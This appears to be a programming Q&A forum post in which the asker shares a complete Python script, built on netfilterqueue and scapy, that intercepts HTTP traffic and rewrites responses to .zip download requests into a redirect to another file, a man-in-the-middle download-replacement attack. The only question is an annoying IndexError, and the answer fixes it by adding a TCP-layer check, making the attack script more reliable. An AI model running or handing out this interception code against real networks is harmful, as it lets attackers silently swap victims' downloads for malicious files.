# Python Exception IndexError in Replace_Downloads.py

Tags: python

Im writing the code for a DNS spoofer Download Replacer program and everything works great, it does what its supposed to do. However, i keep getting this annoying:
- "Exception IndexError: IndexError('Layer [TCP] not found',) in 'netfilterqueue.global_callback' ignored
"
This error is driving me crazy :P

Here is my code for the Replace_Downloads.py:

```
#!/usr/bin/env python

import netfilterqueue
import scapy.all as scapy

ack_list = []

def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        if scapy_packet[scapy.TCP].dport == 80:
            if ".zip" in scapy_packet[scapy.Raw].load:
                print("[+] zip Request")
                ack_list.append(scapy_packet[scapy.TCP].ack)

        elif scapy_packet[scapy.TCP].sport == 80:
            if scapy_packet[scapy.TCP].seq in ack_list:
                ack_list.remove(scapy_packet[scapy.TCP].seq)
                print("[+] Replacing file")
                modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://www.example.org/index.asp\n\n")

                packet.set_payload(str(modified_packet))

    packet.accept()


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
```

Answer (score 1):

Not all IP packets are TCP.

You just need to add a check before starting to unpack pieces of the TCP layer. An easy way would be to replace

```
scapy_packet.haslayer(scapy.Raw):
```

With

```
scapy.Raw in scapy_packet and scapy.TCP in scapy_packet:
```